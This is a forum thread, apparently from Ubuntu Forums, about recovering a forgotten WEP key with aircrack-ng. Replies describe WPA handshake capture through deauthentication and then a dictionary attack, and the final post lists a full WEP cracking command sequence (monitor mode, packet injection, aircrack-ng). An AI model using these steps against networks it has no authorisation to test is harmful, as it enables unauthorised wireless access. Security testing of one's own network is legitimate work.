Results 1 to 5 of 5

Thread: aircrack-ng usage help

  1. #1
    Join Date
    Apr 2008
    Beans
    25

    aircrack-ng usage help

    Hi
    I am able to use aircrack-ng but packet injection does not work.
    I just wanted to know if there is a way to recover a password.
    The WEP key for the password is stored in Vista and I cant recover in it.
    However it is a 10 digit numeric password generated by the WEP router. And I remember the first 5 digits of it but not the remaining.

    Is it possible to somehow pass the first 5 digits while cracking as a parameter to the aircrack-ng program to reduce the cracking time and more importantly the no of data IVs that are needed to crack the program? It takes more than 4 hours just to get 1000 data IVs because packet injection does not work on my box and according to the guide it takes more than 10000 for a crack to work.

    Simply put is there any way to allow aircrack-ng to take the first 5 digits as is and crack the remaining password by applying brute force etc.

  2. #2
    Join Date
    Apr 2007
    Beans
    37

    Re: aircrack-ng usage help

    Not that I know of. If there was a way, brute force would still take too long. You should try to apply a driver patch for your card and compile it so you can get injection. Then you can get the key in 15 minutes.

  3. #3
    Join Date
    Apr 2008
    Beans
    25

    Re: aircrack-ng usage help

    Thanks I remembered the other 5 digits too.
    But can someone tell me the appropriate way to crack WPA passwords too. I assume WPA only uses some sort of brute force.

  4. #4
    Join Date
    Dec 2007
    Beans
    156

    Re: aircrack-ng usage help

    WPA cracking is shorter in a way, but it's less likely that you'll crack it. You need to catch what is known as a WPA 4-way authentication handshake that is sent when a client connects to the access point. You can use aireplay's deauthentication feature to disassociate an already connected client to reconnect, and use airodump to capture the handshake.

    from there, only a new dictionary attack works. so if they have a very strong password, it's unlikely that you'll be able to crack it. i hear there is some new development in this area that uses rainbow tables, but i'm not exactly sure how that works.

    you can find a full guide to cracking wpa networks on the aircrack-ng suite wiki.

  5. #5
    Join Date
    Sep 2009
    Beans
    21
    Distro
    Ubuntu Studio 9.04 Jaunty Jackalope

    Re: aircrack-ng usage help

    Is it possible to somehow pass the first 5 digits while cracking as a parameter to the aircrack-ng program to reduce the cracking time and more importantly the no of data IVs that are needed to crack the program? It takes more than 4 hours just to get 1000 data IVs because packet injection does not work on my box and according to the guide it takes more than 10000 for a crack to work.

    Simply put is there any way to allow aircrack-ng to take the first 5 digits as is and crack the remaining password by applying brute force etc.
    Simply put no you cant have it pass the first 5 digits if it truly is your wireless network you can use cain and able google it and it will recover the WEP key if you havent formated since you used the key. If thats not an option you can use BackTrack 3 in which case you need to flood the router with packets. and trick it to send back IV's even tho your not connected to it then you use aircrack-ng to crack it once you have enough IV's(and that number would be around 50k to 100k IV's).
    This is a simple penetration test i did on my own company router to show how unsecure WEP really is.

    #=comments
    Code:
    airmon-ng    #shows adapters
    airmon-ng stop ath0     #stops ath0 adapter
    ifconfig wifi0 down
    *leaving out specific part on purpose*
    airmon-ng start wifi0  
    #the above steps basically sets up wireless card into monitor mode
    #check to see if yours supports packet injection and monitor mode
    #if i dont quit right there or buy a new card that does
    airodump-ng ath0   # shows lists of wireless networks it will update until u hit ctrl-c
    #when you see your network type
    airodump-ng -c (channel i.e 1 to 11) -w (filename i.e wepkey) --bssid (bssid of your network) ath0
    #open second conole with the first one running still
    aireplay-ng -1 0 - (bssid) -h (MAC) ath0
    aireplay-ng -3 -b (bssid) -h (MAC) ath0
    # then in third console with first and second still running
    #after you've got enough IV's you use aircrack-ng if it fails it will retry every 5000 IV's
    aircrack-ng -b (bssid) filename-01.cap
    ***EDIT*** also you can just go to your router page and disable the wep key and re enable it with another key or better yet use WPA-PSK or TKIP
    your router page password isnt the same as your wep key if you never set one google the default password which is usually believe it or not PASSWORD :\

    hxleet
    Last edited by hxleet; September 29th, 2009 at 02:07 AM.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •